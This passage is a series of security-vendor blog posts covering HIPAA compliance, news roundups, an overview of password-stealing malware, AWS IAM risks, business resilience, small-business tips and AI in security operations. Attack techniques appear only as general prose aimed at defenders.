may find it helpful as a starting place to identify potential gaps in their compliance with the HIPAA Security Rule. Addressing these gaps can bolster compliance with the Security Rule and improve the organization’s ability to secure ePHI and other critical information and business processes. Read how NIST “maps” to the HIPAA Security Rule in the HIPAA Security Rule Crosswalk to NIST Cybersecurity Framework. Step 2: Remediate identified risks and address compliance gaps Once you’ve identified your organization’s risks, take immediate steps to address the gaps within your security program. Again, a consultant who has practical experience in healthcare security will be very useful in providing strategic guidance, as well as advice on risk mitigation. Many organizations use the same consultant who performed their initial risk assessment. Your consultant may develop specific programs, policies, standards, and procedures, as well as support or help implement key security practices and controls. For example, they may assist in prioritizing vulnerabilities and make recommendations for remediation in your EHR environment. Or, they may provide pre-packaged employee security awareness training that meets HIPAA guidelines, such as educating employees on security risks and running them through attack scenarios. Make use of security technology to help you more quickly address the gaps in your compliance program — and consider platforms versus point solutions, giving you the ability to address multiple issues at once. Also, look for solutions that address both on-premises and multi-cloud environments as HIPAA regulations apply to both (see Guidance on HIPAA & Cloud Computing). For example, look for such use cases as the automation of asset discovery and the ability to categorize those assets into HIPAA groups for easy management and reporting. Those same solutions may also perform vulnerability assessments, automate the prioritization of vulnerabilities for mitigation, and integrate with ticketing solutions to ensure the most critical are being remediated while overall risks are mitigated. Step 3: Take advantage of automated compliance reporting The evaluation standard of HIPAA requires covered entities to perform and document ongoing technical and non-technical evaluations to establish the extent to which their security policies and procedures meet the security requirements. Simplify and speed this process by taking advantage of automated compliance reporting. Look for solutions with predefined report templates for HIPAA, as well as other key regulations such as PCI DSS, NIST CSF, and ISO 27001. Consider ease-of-use, such as being able to define groups of assets — for example, a HIPAA group that includes sensitive assets connected to patient data or protected data. How easy it is to view, export, and customize the reports? What percentage of regulation coverage is included in predefined reporting? Most solutions do not cover all the requirements defined by the HIPAA Audit Protocol, but they will give you a jump on your HIPAA checklist. Many security management platforms also include additional predefined event reports, such as reports by data source and data source type, helping to make daily compliance monitoring and reporting activities more efficient. Also, look for an intuitive and flexible interface that allows you to quickly search and analyze your security data, as well as the ability to create and save custom views and export them as executive-ready reports. Finally, solutions that provide centralized visibility of your cloud and on-premises assets, vulnerabilities, threats, and log data from firewalls and other security tools are key to giving you the most complete and contextual data set for maintaining and documenting continuous compliance. Step 4: Implement Monitoring and Breach Notification Protocols The Breach Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA covered entities and business associates to provide notifications if they experience a breach that involves unsecured protected health information. Security management platforms can help to simplify and automate monitoring for breaches on your network, ensuring you are able to more quickly detect and contain a breach, as well as provide the required notifications. As more organizations in healthcare are migrating data and applications to the cloud, make sure the technology you’re choosing offers advanced threat detection across both on-premises and multi-cloud environments. Simplify compliance management by choosing a solution that combines an array of essential security capabilities in one platform. These may include, but are not limited to: asset discovery, vulnerability assessment, intrusion detection, behavioral monitoring, endpoint detection and response, SIEM event correlation, file integrity monitoring (FIM), and log management. By combining these use cases in a single dashboard, you are better able to quickly identify, analyze, and respond to emerging threats that target your EHR environment. Intelligence it key to threat detection and incident response, so consider vendors who have in-house research teams as well as access to external threat intelligence communities and other sources that can provide insight into the latest global threats and vulnerabilities — and in particular, those that are specific to healthcare. However, intelligence without context will create lot of distracting “noise” for your team. So, check that the solution goes beyond just providing intelligence to incorporating it directly into your dashboard, including providing recommendations on how to respond to identified threats. With this intelligence and guidance at your fingertips, you can react quickly to the latest tactics, techniques, and procedures used by threat actors. And, you are assured of an always-up-to-date and optimally performing security monitoring solution. Need more info on how to respond to a breach? See the HHS Quick Response Checklist. Step 5: Continuously evaluate and manage risk Whether you are managing ongoing HIPAA compliance internally or are using an external organization, avoid last-minute scrambling for annual evaluations and audits by employing a year-round risk management program. Such a program requires having real-time visibility of your environment, including system component installations, changes in network topology, firewall information, and product upgrades. Use a unified platform to gain this visibility and enable monitoring in a central location (opposed to various point solutions). Here are a few examples of where a platform would be helpful for continuous risk and compliance management: Manage assets and risks Examples: Use automated asset discovery for on-premises and cloud environments and then create asset groups such as business critical assets or HIPAA assets for ongoing monitoring, management and reporting. Identify systems with known vulnerabilities and use correlation rules to detect threats. Monitor access control; data security; information protection, processes and procedures; and protective technology Examples: Monitor for successful and failed logon events to assets. Monitor for communications with known malicious IP addresses or use file integrity monitoring (FIM) to detect, assess and report on changes to system binaries, and content locations. Schedule vulnerability scans, automate assessments, and plan for mitigation. Review events and detected incidents. Detect anomalies and events; and ensure continuous security monitoring and detection processes Examples: Aggregate events from across on-premises and multi-cloud environments. Classify threats based on their risk level. Monitor for stolen credentials, malware-based compromises such as communication to a known command and control (C&C) server, anomalous user and admin activities, file integrity, and vulnerabilities. Automate event and incident analysis; mitigation Example: Automate forensics tasks to be executed in response to a detected threat and simplify forensics investigations with filters, search and reporting capabilities for event and log data. Automate actions to contain threats, such as isolating systems from the network. Automated reporting Use out-of-the box reporting to document that you’ve made an accurate assessment of the risks and vulnerabilities to the confidentiality, integrity and availability of all electronic PHI — and to quickly show the status of technical controls that align to HIPAA or other regulations. Maintaining adherence to HIPAA is no small feat considering the dozens of criteria that are considered in the HIPAA Audit Checklist. Attempting to manage your compliance program manually and without the help of expert healthcare security consultants will not only take up massive amounts of time, it could result in your team missing an essential component of the regulation, or worse yet, enduring a breach that compromises patient data or takes down the network. However, with the right mix of people, processes and technology, it’s not an impossible to stay on top of compliance management while ensuring your network is secure and patient data protected year-round. HIPAA Regulations HIPAA Privacy Rule: This Rule set national standards for the protection of individually identifiable health information by three types of covered entities: health plans, healthcare clearinghouses, and health care providers who conduct the standard healthcare transactions electronically. HIPAA Security Rule: This Rule sets national standards for protecting the confidentiality, integrity, and availability of electronic protected health information. The Privacy Rule is located at 45 CFR Part 160 and Subparts A and E of Part 164 (e-PHI). HIPAA Breach and Notification Rule: The HIPAA Breach Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA covered entities and their business associates to provide notification following a breach of unsecured protected health information.
It’s December, so you’re either on holiday, wishing you were on holiday, or hoping the next security article you read isn’t related to predictions. Well, I can’t help you with the holidays, but I can promise there will be no predictions here. It’s just good old-fashioned news of the juiciest news that made my heart flutter US Postal Service Ah, the good old USPS was running a weakness that allowed anyone who has an account to view details of around 60 million users, and in some cases modify the account details on their behalf. Luckily, a security researcher spotted the error about a year ago and notified USPS. Unluckily, the USPS didn’t respond to the researcher or fix the issue. Luckily, the researcher reached out to little known cyber-reporter by the name of Brian Krebs who contacted USPS and lo-behold a miracle happened and the issue was fixed in 48 hours! USPS Site Exposed Data on 60 Million Users | Krebs on Security This raises the question as to is there anything lesser-known researchers who don’t have the public profile of Brian Krebs can do to help companies fix issues outside of a formally defined bug bounty program? Back in September, Troy Hunt posted on the very topic on the effectiveness of publicly shaming bad security. And not to say I agree with shaming companies, but when you look at instances like USPS, you do wonder if there is a better way. The Effectiveness of Publicly Shaming Bad Security | Troy Hunt GCHQ Reveals it Doesn't Always Tell Firms if Their Software is Vulnerable to Cyber Attacks In other words, spy agency keeps secrets. There are four reasons given as to why GCHQ may not disclose flaws, being: There is no way to fix it The product is no longer supported The product is so poorly designed it can never be secure There is an overriding intelligence requirement that cannot be fulfilled in any other way I particularly like number 4 as the catch-all clause. You could say there’s an overriding intelligence requirement to almost anything, and refuse to release any details under secrecy laws. I’m not necessarily bashing GCHQ, governments have been known for stockpiling exploits. They have a particular mission and objective, and this is how they go about fulfilling it. However, it does mean companies should not rely solely on GCHQ or other government agencies for their threat intelligence. Rather, building its own capabilities and threat sharing channels remain necessary. GCHQ reveals it doesn't always tell firms if their software is vulnerable to cyber attacks. | Sky News Scamming the Scammers I don’t think there are many stories more satisfying than when scammers get taken for a ride. This time courtesy of Hacker Fantastic who got contacted by the famous singer Rhianna out of the blue to help her get some money. Scamming the scammers | Medium, Hacker Fantastic ENISA Releases Online NIS Directive Tool ENISA released an interactive tool showing the relevant national laws and regulations, and per sector and subsector the national authorities supervising the NIS Directive. It’s pretty cool. NIS Directive Tool | ENISA Open
Password security has always been a challenge. Brute force attacks are constantly getting more powerful, but they aren’t the only threat you have to worry about. A range of password stealing malware continues to grow in popularity. One example, Agent Tesla, has seen its detection rate grow 100% in just three months, according to data from LastLine. Despite this rapid growth, Agent Tesla is far from the most popular. That title goes to Pony, which represents 39% of the total password stealer detections, according to Blueliv’s 2018 report, The Credential Theft Ecosystem. LokiPWS and KeyBase trailed Pony at 28% and 16%, respectively. These password stealers are each capable of stealing credentials and other information from a wide variety of programs. Each is unique with its own techniques for delivery and a range of features that hackers can use to mount attacks. Despite the differences, each of these programs can have severe impacts on their victims. The negative impacts can range from having all of the money stolen from an individual’s accounts, to the theft of a company’s intellectual property. The key features of some of the most common password stealers are listed below: Agent Tesla Like most password stealers, Agent Tesla can access a wide variety of your information, ranging from your credentials to your keystrokes. It can even take screenshots and videos from your device’s camera. Agent Tesla targets a number of major programs, including web browsers, email clients, FTP applications and other commonly used software. Once Agent Tesla has been installed on a target’s computer, it can also be used to download other malware. This feature allows threat actors to intensify their attacks and make them even more devastating. Its pricing shows that the malware industry hasn’t been left behind in the X-as-a-service boom, because it is available as part of a plan that starts from $15 per month. This price includes all the 24/7 support someone might need to assist them in their criminal endeavors. Of course, payments are made in Bitcoin. Despite running what must have been an incredibly profitable business, Agent Tesla’s creators have recently posted an update stating it will crack down on illegal use of the program. Under its terms of service, it declares that the software must only be used within the law, but features such as anti-antivirus throw these intentions into question. Due to the recent media attention that Agent Tesla has received, the developers will strip some of its more questionable features, such as anti-antivirus and webcam capture. They also claim to be banning those who are using the program maliciously. Only time will tell whether the creators are sincere, or if this is merely an attempt to keep the authorities from knocking down their doors. Pony Pony is currently the most popular password stealer, but it’s certainly not new. In the past, it has been used to control a number of enormous botnets, which by 2013 had already stolen more than two million credential sets. In 2014, it involved into a series of attacks that stole $200,000 worth of cryptocurrencies, as well as 700,000 sets of credentials. In recent years, Pony has seen prominence as a loader alongside other malware, such as CryptoWall and Angler. These programs, a type of ransomware and an exploit kit, respectively, help attackers launch even more devastating assaults. LokiPWS As the second most commonly encountered password stealer, LokiPWS has been involved in a significant number of attacks. It can be purchased from a range of illicit marketplaces for between $200 and $400, depending on the desired functionality. LokiPWS is comprised of a loader, a password stealer and a wallet stealer, which makes it useful in a variety of attacks. TrickBot TrickBot was originally a banking trojan, but has since been updated to steal other credentials as well. This malware is modular and continues to have new features added by its developers. The coding for the newest components isn’t as clean as the earlier parts, but if it continues to be refined, we could see TrickBot used in a greater number of password stealing scams. Common Attack Vectors Attackers can load password stealers to their target’s systems in the same ways as most malware. These include social engineering, fake Adobe flash and other program updates, drive-by downloads, and through “free” online software. The following are some of the most common techniques that we see associated with password stealers: Social Engineering Social engineering (a.k.a. phishing) is one of the most prominent methods that hackers use to load password stealers onto their victims’ computers. They commonly use convincing emails to trick the recipients into downloading an attachment. The level of sophistication in the email will depend on the attacker’s game plan. Some may send highly-tailored emails to a select group of people in the hopes of convincing a large percentage to download the attachment. Others may put less effort into each email, but send them to a much greater number of people. The rate of success won’t be anywhere near as high, but this technique allows them to attempt to manipulate a much larger group of people. The attachments can take many forms, including RTF files, PDF files, PUB files, DOC and DOCX files, XLS files, EXE files, images and more. It is common for the malware to be disguised as seemingly legitimate invoices and other important documentation. These tricks can easily fool users into unwittingly granting access to the password stealer. A recent campaign has been taking advantage of vulnerabilities to spread both LokiPWS and Agent Tesla. The target is tricked into downloading a DOCX file, which in turn downloads an RTF file. This technique takes advantage of both a Microsoft Office remote code execution flaw, as well as a memory handling bug, in order to help slip the malware past antivirus software. TrickBot is often hidden in Excel files. In these attacks, the user is told that the document was created with an older version of the program, and that they need to “enable content” in order to access the file. Clicking this button runs the macros, which kicks off the malicious code and begins the TrickBot download. Agent Tesla even has a customizable “Fake Message” option. This allows an attacker to tailor a pop-up that convinces the target to install the malware. This feature makes it simple to create a legitimate-looking dialogue box that might say something like “This program needs to be updated before it can launch. Update now?” Users will often click to run the update without even thinking about it. Something so simple can end up having dramatic effects, because of course, the program isn’t actually being updated. What’s really going on is that Agent Tesla is tricking the user into letting it install itself. Attacks Launched from USBs Malware like Agent Tesla can also be preconfigured to run from a USB stick. This gives attackers more imaginative ways to upload their malware onto a target’s computers. One example involves threat actors leaving a bunch of malware-riddled USBs in an employee car park in the hope that some curious workers will pick them up and plug them into their office computers. When the USB is plugged in, Agent Tesla loads to the computer and can begin logging everything that the user does. Getting Past Your Computer’s Defenses Computers and networks have a range of defenses that help keep the bulk of malware at bay. These aren’t perfect, because the landscape of cyber threats is constantly evolving. This makes it much more challenging to prevent cutting-edge attacks. Agent Tesla has a wide variety of configuration options that enable threat actors to customize how they launch their attack to bypass defenses. With just a few clicks in an easy-to-use settings menu, an attacker can choose whether to disable the target’s Task Manager, how it will get past anti-analysis tools, whether it will launch automatically after rebooting, and much more. The Agent Tesla website used to feature support that gave tips on getting around defenses, including advice on how to hide the malware in other files, and how to trick security tools. The website may have claimed that the software was only designed for monitoring personal computers, but all of this auxiliary information hints at other intentions. How Do Password Stealers Take Your Credentials? Once a password stealer has made its way onto the target’s systems, it starts getting to work. There is some variance in how each of these programs function, but many of the core elements and features are the same. Keyloggers Keyloggers are some of the most commonly used tools for stealing credentials and other information that may be useful to attackers. They can be set up to record every keystroke that the target makes, sending the data back to the attacker. Of course, whenever the target types their usernames and passwords, this information goes straight into the attacker’s hands. Clipboard access Many password stealers can also access the data that is being stored in your clipboard. Clipboards aren’t a secure part of your computer, and the information that is stored in them can be accessed by all active processes, which means that malware can also take this information. This is somewhat worrying for those whose password manager uses the clipboard, but the majority of these programs tend to erase the data straight away. If you ever have to manually copy a password, it’s probably best to clear the clipboard after you have finished pasting. Screenshots It’s also common for password stealers to take screenshots of their target’s activity. This helps attackers keep track of what their victims are doing and enables them to log even more of their information. Videos Some password stealers can hijack a device’s camera and take pictures or video. This allows threat actors to build up an even greater profile of information on their victims. Which Programs Do Password Stealers Target? Most of the common password stealers can take credentials and other information from a wide variety of applications. These include common web browsers like Chrome, Safari, Microsoft Edge and Opera, FTP programs like FileZilla and WinSCP, email clients like Outlook, and many more. Some of these password stealers are set up to access data from more than one hundred commonly used programs. How Does This Information Get Sent Back to the Threat Actor? Once password stealers get their hands on your valuable data, they send it back to the attacker. The information is surreptitiously sent to a server, and then either to the attacker’s email or a dashboard. These dashboards vary in complexity, but some provide an impressive array of organization that makes it easy for threat actors to keep track of a large number of victims. As an example, Agent Tesla’s dashboard shows the progress of attacks against each of its targets. Menus clearly show the keystrokes, screenshots, passwords and other data that has been collected. Once an attacker has this data, they can either sell it in bulk, use it to steal from you, or use it to mount further attacks and penetrate your systems more deeply. How Can Password Stealers Impact Organizations and Individuals? Passwords are one of the most important systems that we have for controlling access to our data. Now that we conduct significant parts of our work and personal lives online, this makes them gateways to incredible amounts of our information. Password stealers can easily grant access to many aspects of our lives and businesses, and the impacts can be disastrous and wide-reaching. At a personal level, password stealers can enable threat actors to withdraw money from your bank account, hijack your social media or even commit complete identity theft. Organizations also face significant threats, because password stealers have the potential to give a threat actor complete access. Once an attacker is inside a company’s systems, they can copy its intellectual property, steal its data, lock up its information with ransomware, or even attempt extortion. The results can be as broad as an attacker’s imagination. Staying Safe from Password Stealers As you can see, password stealers represent a significant threat. Unfortunately, there is no surefire way to completely guard yourself and your organization. Despite this, following security best practices will reduce the risks to an acceptable level, especially if adequate staff training is part of the process. Individuals and employees need to be aware of the risks and only open attachments if they are certain that they are legitimate. It’s important to encourage a workplace culture where employees feel comfortable to check with IT whenever they are unsure of a potential security issue. Implementing two-factor authentication is another crucial mitigator. If an authentication process requires a token, biometric input, an authenticator app or an SMS code in addition to the user password, it can make it significantly more difficult to break into the systems. Password stealers can grant absolute access to our online worlds, so it’s important to be vigilant against them. While there are some programs that claim to be able to remove them, like all things in cybersecurity, it is much less costly to focus on prevention.
Businesses rely on technology more today than they ever have in the past. In fact, many business models are built entirely around a technology which, if disrupted, could spell ruin. A traditional business with a brick and mortar presence is probably better-placed to withstand an extensive online disruption or outage. For example, if a bank’s online system or mobile app is unavailable, it has other options to fall back on – even if it does involve customers physically having to walk into branches to deposit cheques. But those examples are rare, and even the most traditional of businesses are embracing the digital revolution at a rapid pace, vaporizing physical assets in the process. One only has to look at their smartphone and see how many physical items it has replaced, from maps, to flashlights, to cameras. So, it’s important that the digital infrastructure that underpins the modern world is resilient. The ‘A’ in the security CIA of ‘Confidentiality, Integrity and Availability’ helped professionals focus on business continuity planning, and disaster recovery. But have we been focusing on the wrong things? Earthquake Resilient Buildings Recently a building surveyor was explaining to me the concept of earthquake-resilient buildings. He highlighted an important point that in most countries, building code objectives are mapped to collapse resilience, not to damage. The analogy is akin to a car which has designated crumple zones to absorb the brunt of the force during an accident. In other words, resilience in buildings and vehicles is all about saving lives - not the building or the vehicle. Which makes me wonder whether businesses have focused on building resilience into the wrong parts. Is the industry focused more on saving the building or the vehicle at the expense of lives? Broadly speaking, while lives are not literally at risk, (although with IoT making its way into every facet of life including medical devices, the risk does increase), there is a lot of personal information that companies are in possession of which slips through the radar of most planning sessions. The response often summed up as, “let’s offer free credit monitoring for a year for our affected customers.” In the building analogy, it’s the equivalent of, “Sorry your building collapsed and everyone died during the earthquake. Here’s a year’s coupon to stay in a local hotel.” Crown Jewels Companies are pretty good at protecting their own crown jewels. But they’re often limited in what they do for their customers. One of the reasons is that the emphasis is put on the wrong type of information. PCI DSS is a well-meaning standard, but forced companies to focus on protecting payment card data. The problem with this approach is that card data is pretty much a commodity. It naturally ages, and new cards need to be issued as a matter of course. A breach simply accelerates the process. The point being that payment cards have natural resilience built into them. That’s not to say that when cards are breached there isn’t a cost associated. It’s to avoid bearing the burden of these costs that card issuers rallied to have PCI DSS implemented, with the threats of big penalties to any company that was beached. This in turn forced companies to disproportionately invest into protecting card numbers over actual customer information. Protecting the buildings at the expense of its inhabitants. Regulations like GDPR are a step in the right direction with its focus on protecting the privacy of individuals. However, it too wields a big stick with the threat of massive fines. So, companies will do what they can to protect their businesses. Retrofitting protection The evolution of many companies mean that protection is often retrofitted under the guise of compliance. But there is a significant difference between retrofitting to prevent business damage, and retrofitting to prevent the entire business collapsing. We need to shift the way we think of information and the controls we put in place that can not only withstand the metaphoric cyber earthquake, but also protect its customers. The first part of this is for businesses to understand what aspects of its digital infrastructure are commodities or standard offerings that can be swapped out or replaced relatively easily, versus custom-designed and individual data that is irreplaceable. For this, the best place to start is the beginning. Design decisions need to be thought out better and not rely on decisions made from years gone by, when the digital landscape was a different place. Haroon Meer probably said it best when he described customer data as being toxic. It has its benefits, but companies should be prepared to wear hazmat suits when dealing with it. This includes not using personal information for trivial functions. For example, does every online registration require a user’s personal information such as date of birth? If not, then why capture it? Similarly, should the user’s email ID be used as their userID? As email has become more important for users, so has the risk of it being targeted. Maybe the data can be captured, but alternative methods used to protect it. Similar to how many companies choose to tokenize card data? Maybe your favourite pizza shop doesn’t need to store your address in all its databases, a tokenized version can suffice. So, if it does get breached, not only are the customer details protected, but business can continue with minimal disruption - allowing true resilience against such events. After all, what’s the point in protecting all your buildings if there’s no-one left to inhabit them?
Three simple steps to protecting your small business Continued news reports of large-scale data breaches and the steady increase of cyber fraud like spam calls, identity fraud and unauthorized account access should be enough to scare anyone. So-called nation-state hackers attempting to infiltrate government entities and universities, massive data breaches, and new Ransomware threats are constantly in the headlines. So why doesn’t this encourage more small business owners to take cybersecurity more seriously? Many small businesses are currently going digital and moving data, applications and services to the cloud. In fact, the most innovative small businesses have embraced digital transformation as an integral part of their growth plans. This evolution makes their business more vulnerable to a lurking hacker. And perhaps too trustingly, many small business owners think that because of their size, they are not a target. Hackers don’t discriminate. Malware doesn’t discriminate. Everyone is a target, and in fact, hackers see the data that small businesses have as a gateway to attacking larger businesses. And Malware essentially looks for open doors (i.e. unpatched machines) to infect. As we look to the start of a new year, there is no better time to assess your business’s cybersecurity posture – or in some cases start from scratch – to ensure you are prepared and can respond to cyberattacks. Here are a few affordable and simple recommendations that can improve your cybersecurity posture and help protect your business from the inevitability of a cyberattack in 2019: Stay Aware: The simplest thing you can do is to stay current on trends and threats affecting small businesses. We’ve seen unprecedented levels of attacks on small business in 2018, especially with Ransomware (where your device is essentially taken hostage for a fee). It’s essential to understand the types of attacks that could put your business at risk as well as the current cybersecurity landscape. Visit AT&T Cyber Aware for the latest news, information to report fraud associated with your AT&T Business account. Hire a consultant: A consultant can take a holistic look at your business, identify the gaps and help you understand how to improve your cybersecurity posture. While some see consultants as an added expense, their role is essential for small businesses that don’t have an IT or cybersecurity expert on staff. A consultant can help you develop and implement a plan for monitoring for threats, incident response and remediation that’s within your budget. Buy Cyber Insurance: Cybersecurity insurance isn’t new. Large enterprises have had a cybersecurity insurance policy in place for decades now. However, 2019 is going to be the first year that it’s accessible and affordable to businesses of all sizes. For AT&T Business customers, this is made possible through policies, underwritten by CNA, with Lockton Affinity serving as the insurance broker. A recent Ponemon Institute Report found that in 2017, cyberattacks cost small and medium-sized businesses an average of $2,235,000. That’s a staggering number that will only continue to increase as hackers become more sophisticated and continue to target the most vulnerable. My advice to small business owners – as you’re thinking about your holiday shopping list, add cyber insurance to that list to give yourself peace of mind. We know small businesses are focused on what they do best, and cybersecurity isn’t always top of mind. Let’s bring it to the top of the list for next year. Anne Chow, President – National Business, AT&T Business
We’ve had a lot to celebrate this year. AlienVault, now an AT&T company, has received many awards, including three this quarter. In October, USM Anywhere was named the 2018 Cloud Security Solution of the Year after receiving the most votes in the industry. This recognition validates our SaaS-driven deployment model that integrates critical security capabilities into a unified platform enabling faster threat detection and response across cloud and on-premises environments. Here’s a photo of Sophia Anastasi, AlienVault UK Partner Account Manager, accepting the award at Computing Security’s awards ceremony. Our channel team is also receiving industry accolades. Last Thursday night at the Channelnomics Innovation Awards ceremony in New York City, Mike LaPeters, Vice President of Global Channels, accepted the award for Security Partner Program of the Year in North America. In October, Mike was selected as a winner of the 2018 Channel Futures Circle of Excellence Awards for his vision, innovation and advocacy of the indirect channel in helping AlienVault solution providers create business value for their customers. On AlienVault receiving these awards, Mike said, “Both of these awards are a testament to our focus on enablement. We help participants in the AlienVault Partner Program to create new opportunities for business growth, expansion and profitability powered by AlienVault USM.” With 2018 coming to close, we are excited to see what the new year brings as we continue to deliver phenomenal security products to our customers and solution providers.
Last week I was off attending IRISSCON in Dublin and so there was no update, and this week I’ve been at the SAN EU security awareness summit - so while I have been hearting things for the last two weeks, I’ve not had a chance to put them down. I don’t want to miss two weeks in a row - so I’ll give you a quick download and hopefully normal service will resume next week! Chat app Knuddels fined €20k under GDPR regulation The chat platform violated GDPR regulation by storing passwords in clear text and for this reason, the regulator imposed its first penalty under the privacy regulation. Chat app Knuddels fined €20k under GDPR regulation | Security Affairs IOC Origins Richard Bejtlich gives a historical view into the origins of IoC’s The Origin of the Term Indicators of Compromise (IOCs) | TaoSecurity The spread of low-credibility content by social bots The massive spread of digital misinformation has been identified as a major threat to democracies. Communication, cognitive, social, and computer scientists are studying the complex causes for the viral diffusion of misinformation, while online platforms are beginning to deploy countermeasures. Little systematic, data-based evidence has been published to guide these efforts. Here we analyze 14 million messages spreading 400 thousand articles on Twitter during ten months in 2016 and 2017. We find evidence that social bots played a disproportionate role in spreading articles from low-credibility sources. The spread of low-credibility content by social bots | Nature.com The $1M SIM Swap A 21-year-old has been accused of SIM-swapping the mobile number of a Silicon Valley executive in order to steal roughly $1 million in cryptocurrency. SIM-swapping 21-year-old scores $1 million by hijacking a phone | ZDNet A day in the life of a trickbot hunter Nice writeup! Day in the life of a researcher: Finding a wave of Trickbot malspam | SANS Crypto hacking If you maintain any software libraries that deal with cryptocurrency wallet private key, there's a huge incentive for hackers to compromise your library's dependencies, and dependencies of dependencies. That's what happened with this npm package I don’t know what to say | GitHub Get SaaSy The NCSC's new SaaS security collection provides a lightweight approach for determining the security of any SaaS application. The collection also includes security reviews of the 12 most asked-about SaaS services used across UK government. SaaS security - surely it's simple? | NCSC Today's Deep Learning "AI" Is Machine Learning Not Magic Well, if AI isn’t magic, I should update my Uncybered browser plugin! Today's Deep Learning "AI" Is Machine Learning Not Magic | Forbes Chinese Ramp up AI When I read stories like this, my worry that machines will take over human jobs subsides. In this story, Chinese cities have rolled out AI-powered facial recognition technology to identify jaywalkers (because I’m sure they’ve solved every other crime out there). The results… well, can you say dystopian? AI Mistakes Bus-Side Ad for Famous CEO, Charges Her With Jaywalking | CX Live I hope to be this petty some day Zuckerberg told Facebook execs to stop using iPhone after Tim Cook privacy comments | Apple Insider Although, is it as petty as 50 Cent? 50 Cent buys 200 tickets to Ja Rule concert to keep seats empty in ongoing feud | CBS news Other stories of interest I still miss my headphone jack, and I want it back | Fast Company AWS has released some free training | AWS Regular Exercise May Keep Your Body 30 Years ‘Younger’ | NY Times The Next Data Mine Is Your Bedroom | The Atlantic The Wartime Spies Who Used Knitting as an Espionage Tool | Atlas Obscura
This is the first of a 4 part blog series on security issues and monitoring in AWS. Identity and Access Management (IAM) in AWS is basically a roles and permissions management platform. You can create users and associate policies with those users. And once those users are established you get set of keys (access key and a secret key), which allow you to then interact with an AWS account. So, it's kind of like having a card key into the data center, and if you get into the data center, you have physical access to assets and you can do a bunch of things - in the AWS world there is no physical access to a data center therefore you can create keys and an API and you can interact with the API to do the same things that you would do in a physical environment, like physically racking servers in a data center. Common IAM risks are associated with folks getting a hold of, for example, a set of keys that have some policy associated with them that enables an attacker to get into the environment and do some potentially risky stuff. Following are a couple examples: EC2 instance creation or deletion. This is fairly common and relatively easy to do compared with the other examples. If somebody gets a hold of a set of keys that allows them to create EC2 instances in your AWS account, that’s the first thing they're going do. There are a lot of bots out there looking for this access, and if a bot finds a set of keys that allows it to start interfacing with EC2, it's going to spin up a bunch of instances - likely to start mining cryptocurrency. This actually happened to Tesla, a pretty good sized company with quite a few resources to allocate to securing their infrastructure. There are many examples in the news about keys getting published to GitHub inadvertently, and there are bots out there scraping GitHub looking for access keys and the second they find them they’re in your AWS account seeing what they can do. Another scenario is roles that do automated things, like take RDS snapshots or EBS snapshots. The attacker might abuse the automated process to back up various resources like EBS or an RDS database. If an attacker gets access to that role or the keys associated with it and takes snapshots of these resources, they can deploy a new RDS database based on the snapshot. And when they do that they get to reset the passwords associated with the database. So now they've got access to all of your data without actually having to have the passwords required on the RDS instance. It's the same thing with the EBS (Elastic Block Store) snapshot. If somebody is able to take a snapshot, basically of a hard drive in AWS, they can launch a new instance connected to that block store and do some interesting things with it. For example, assuming they’re able to create an SSH key pair in your account, they could launch a new instance from the snapshot and assign their key pair to the instance, giving them full access to the data of the original instance. If they can’t create SSH keys in your account, they might try to mount the snapshot to an existing instance they can already access. Basically this is a crafty way to work around credential control and access control. This is a technique that's been used to actually exfiltrate data out of AWS, just by taking snapshots. The last example is account hijacking. One story that got some headlines a while back involved attackers getting full control of an AWS account through a set of keys. The account was compromised so thoroughly that trust in the service was eroded to the point that the company went out of business – an extreme scenario, but if someone gets that level of access in your AWS account, you can pretty well expect that they're going to hold it for ransom. There are other risks, like S3 bucket exposure risks, that are much easier to take advantage of. The good news is that Amazon has recently added 4 new options that allow the account owner to set a default access setting for all of an account's S3 buckets. The new settings override existing or newly created bucket-level ACLs (access control lists) and policies. We’re not highlighting S3 bucket exposure risks above because there were too many to choose from. In my search for specific data exfiltration issues that have occurred with S3, I came across this GitHub Repo where the well-known public breaches are organized by date. You'll find 25 different instances of actual breaches where somebody had leaked data from a publicly exposed S3 bucket. It works as follows: Say somebody creates an S3 bucket, where they’ve got some process running that’s capturing some data and writing the information to a file in the bucket. Then somebody else comes along later and makes that bucket publicly readable. Or, the bucket was initially set up as publicly readable and nobody noticed it. This kind of thing happens all the time, and there are adversaries out there just scanning S3 looking for publicly accessible buckets. And once they find the buckets they just scrape the data in them and figure out what treasures they've got later. They don't even care what they’re downloading. It’s a simple thing for them to carry out. It doesn't require a super sophisticated attack vector. We'll dig further into AWS security risks and what to do about them in the next blog of this series.
The cognitive tools/technologies of machine learning (ML) and artificial intelligence (AI) are impacting the cybersecurity ecosystem in a variety of ways. Applied AI machine learning and natural language processing are being used in cybersecurity by both the private and public sectors to bolster situational awareness and enhance protection from cyber threats. The algorithmic enablers that make ML and AI pinnacles of cybersecurity are automation and orchestration. Last year, the research and analyst firm Gartner created a term called SOAR. It stands for Security Orchestration, Automation and Response. A key element of SOAR has been the automation and orchestration elements. An excellent analysis of the impact of automation was provided by Stan Engelbrecht in his column in Security Week called The Evolution of SOAR Platforms. Stan noted “as SOAR platforms evolve, they are requiring less experience from users. Vendors embed security expertise into the products, in the form of pre-built playbooks, guided investigation workflows, and automated alert prioritization. Automation and orchestration features have also reached a level of sophistication where they can be integrated into an existing security framework without relying on users to know exactly what should be automated.” Indeed, SOAR and corollary cybersecurity automation technologies combined with ML and AI tools can be viewed as a strong framework for mitigating evolving threats. AI and ML have emerged into new paradigms for automation in cybersecurity. They enable predictive analytics to draw statistical inferences to mitigate threats with fewer resources. In a cybersecurity context, AI and ML can provide a faster means to identify new attacks, draw statistical inferences and push that information to endpoint security platforms. Three significant factors are heightening their risk: 1) Skilled Worker Shortage: It is widely noted that the cybersecurity industry is facing major skilled worker shortages. According to data published on Cyberseek, U.S. employers in the private and public sectors posted an estimated 313,735 job openings for cybersecurity workers between September 2017 and August 2018. That's in addition to the 715,000-plus cybersecurity workers already employed. It is not just a U.S. problem, but a global problem and the demand for skilled workers to address the growing prevalence and sophistication of cyber-threats is growing exponentially. 2) Expanding Digital Connectivity: The expanding connectivity of the Internet of Things (IoT) has greatly increased cyber vulnerabilities. IoT refers to the general idea of devices and equipment that are readable, recognizable, locatable, addressable, and/or controllable via the internet. This includes everything from home appliances, wearable technology and cars. Gartner predicts that there may be nearly 26 billion networked devices on the IoT by 2020. The numbers of devices provide a larger attack surface with more targets for cyber criminals and makes defending networks and endpoints even more difficult. 3) Sophistication of Adversaries: Cybersecurity criminals are using machine learning techniques to discover 